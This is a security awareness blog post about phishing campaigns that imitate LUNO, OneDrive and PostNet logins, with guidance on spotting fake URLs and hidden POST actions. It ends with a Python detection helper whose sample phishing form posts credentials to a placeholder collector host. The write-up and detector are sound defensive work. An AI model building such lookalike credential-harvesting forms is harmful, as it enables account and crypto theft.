Threats in the Wild

There is still no sign of any slowdown among hackers attempting to compromise organisations’ email through crafted campaigns that exploit national and international affairs surrounding the coronavirus pandemic and the resulting lockdown restrictions around the world.

You might well be asking yourself the following questions:
• Why bother continuing as a hacker when everyone is experiencing difficulties in life due to the current pandemic circumstances?
• How many individuals are actually falling for these campaigns for them to be reasonably profitable to the hackers?

The answers to these two questions are simple:
• It typically only takes one point of compromise (usually via an individual) within an organisation for hackers to start taking advantage.
• Persistence in this dodgy industry usually pays off.
• Information is a source of learning and knowledge can become power.
“He who is prudent and lies in wait for an enemy who is not, will be victorious.”
― Sun Tzu, The Art of War

LUNO

Cryptocurrencies and online trading have made waves in recent years and grown drastically in popularity. Many people have invested in these money-making platforms and generated huge profits, seemingly overnight, with a bit of research and some money to spare.
Naturally, it hasn’t taken long for threat actors to recognise the profits to be made by compromising crypto and trading accounts, especially now that the user base extends beyond professionals to the average ‘Jill & Joe Soaps’. This alone means that there are people using these platforms without fully understanding the systems and how they operate. The risks that come with owning an account, which leave room for error or manipulation, are also not well known.

The image below depicts an email notification from LUNO, a cryptocurrency trading platform, advising that incoming funds are being held due to an issue. The recipient is recommended to ‘kindly click here to resolve the issue’ and is redirected to an external website.

The website reached via the redirect looks virtually identical to the actual LUNO login page. Many would naturally expect a login page as the first step in accessing their account to authorise a payment, which makes it even more credible, to the point that errors or slight inconsistencies would be ignored.

Comparing the fake LUNO login page (reached via the link in the email) against the authentic page shows just how similar the counterfeit website is.


Figure 1: Faked LUNO Login Page

  • The URL (web address) does not contain the LUNO domain, luno.com.
  • The Email, Password and Mobile Number fields are immediately visible.

Figure 2: Legitimate LUNO Login Page

  • The URL (web address) of the LUNO domain, luno.com is provided.
  • Only the email field is immediately visible.

They certainly both look the same at first glance. The biggest indicator that it is fake is the URL or web address, which should always point to the organisation’s actual domain. Domains are unique and can only be managed by the organisation that owns them. A quick Google search will easily help identify the authenticity of spoofed or suspicious websites like these.

One needs to be very careful of these kinds of scams, as your crypto wallet can be drained in seconds, with the added consequence that any linked bank accounts are exposed too.

Shared Marketing Documents

As is very common nowadays, documents are constantly shared via email or online platforms like Dropbox, OneDrive, SharePoint, and many others, depending on the confidentiality or size (in MB) of the attachments.

PDFs by design allow encryption and the embedding of digital signatures, securing the document content from unauthorised eyes or from being edited by others. It’s concerning when users share PDF files using external links instead of just attaching them to the actual email, and this should immediately raise a flag of suspicion.
The following is a perfect example of exactly this, i.e. an email containing an external link to a PDF document. Another suspicious flag is that neither the contents nor the purpose of the document are specified.

The external link, supposedly to the PDF document, navigates to a website landing page that provides yet another link to the document. This is intentional as it introduces multiple layers of navigation in hopes that email filters are unable to resolve and scan all the layers for suspicious content. The URL (web address) needs to be given special attention.

Moving on, the next navigational layer presents a OneDrive login page. Unfortunately, this is not the actual OneDrive login page, judging by the URL and the deliberate invitation to continue with any of various email account providers.

Basically, this is a clear phishing attempt to trick the visitor into providing email credentials that are likely to be shared across numerous services. One needs to guard personal and business accounts like a state secret, as it is essentially your whole life that is digitised – the past, present and future.

SA Post Office/Postnet

South Africans are likely by now to be aware of the court case raised by the South African Post Office to block courier companies from delivering packages weighing 1kg and less.

It clearly hasn’t taken long for this information to spread, as we’ve recently started seeing an increase in phishing campaigns capitalising on the uncertainty caused by this court case, even though it has yet to be finalised.

In one such example, an email notifies the recipient, in this particular case a business, of an unsuccessful delivery. The email clearly states the incident and the action to be taken, with an attached PDF document providing more details. The email also claims to be from a dispatch supervisor, adding a false sense of legitimacy.

Upon opening the PDF, one is met with a similar message and a link to print a label required for collection. On a sidenote, why not just include the label in the email or attachment… Still, nothing is immediately suspicious at this point.

On further navigation, after clicking the link to ‘print’, one is presented with a PostNet landing page requesting credentials to access the shipment tracking.

Here’s where the red flags start to appear. Instead of printing, you are navigated to a website that looks like PostNet’s shipment tracking landing page, but the URL gives away that this is in fact NOT the case.

When inspected, none of the links on the website work and the only possible option is to enter an email address and password, but there’s no way to create an account. This should be enough to make any user turn away from accessing the supposed shipment tracking service.

Diving a bit deeper with the browser’s built-in inspect tool to investigate the hidden code revealed something else of interest.

A POST* command was found that points to yet another external website, still nothing relating to the actual Post Office or PostNet.

*POST command – In computing, POST is a request method supported by HTTP used by the World Wide Web. By design, the POST request method requests that a web server accepts the data enclosed in the body of the request message, most likely for storing it. This is often used when uploading a file or when submitting a completed web form. – Wikipedia

This POST command is a clear indication of the intention to steal credentials, aka phishing. Any email/password combination entered will be submitted to the external website and controlled by the hacker who crafted the campaign. This is yet another example of the craftiness of hackers and the evasive techniques used to bypass detection systems.
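The two checks described in this write-up, the LUNO section’s ‘does the URL point to the organisation’s real domain’ test and the PostNet section’s hidden POST action, can be made repeatable with the added Python triage helper below; it is example code, not part of the original article, and the page URL, hostnames and HTML are constructed samples (the .example hosts are placeholders).

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

CREDENTIAL_FIELDS = {"email", "password", "pass", "passwd", "mobile", "phone", "username", "login"}  # assumed list

class FormScanner(HTMLParser):
    """Collect every <form> on the page with its method, action and input fields."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "method": (a.get("method") or "get").upper(), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            self._current["inputs"].append((name, (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def belongs_to(host, expected_domain):
    """True for the organisation's domain or a subdomain; a lookalike such as luno.com.evil.example fails."""
    host, expected_domain = host.lower(), expected_domain.lower()
    return host == expected_domain or host.endswith("." + expected_domain)

def triage_page(page_url, html, expected_domain):
    """Return red flags: page host off-domain, and any credential form whose action submits off-domain."""
    findings = []
    page_host = urlsplit(page_url).hostname or ""
    if not belongs_to(page_host, expected_domain):
        findings.append(f"page host {page_host!r} is not under {expected_domain}")
    scanner = FormScanner()
    scanner.feed(html)
    for form in scanner.forms:
        action_url = urljoin(page_url, form["action"])  # a relative action resolves to the page host
        action_host = urlsplit(action_url).hostname or ""
        creds = [n for n, t in form["inputs"] if t == "password" or n in CREDENTIAL_FIELDS]
        if creds and not belongs_to(action_host, expected_domain):
            findings.append(f"form {form['method']} {action_url} collects {creds} and submits to {action_host!r}")
    return findings

# Constructed sample: a lookalike login page whose form posts to a third host (hostnames are placeholders).
SAMPLE_URL = "https://luno-secure-login.example/verify/index.html"
SAMPLE_HTML = """<form method="post" action="https://collector.example/submit.php">
<input type="email" name="email"><input type="password" name="password"><input type="text" name="mobile">
<button type="submit">Log in</button></form>"""
```

Calling triage_page(SAMPLE_URL, SAMPLE_HTML, "luno.com") reports both the off-domain page host and the credential form posting to collector.example, while a genuine login page posting to its own domain returns no findings.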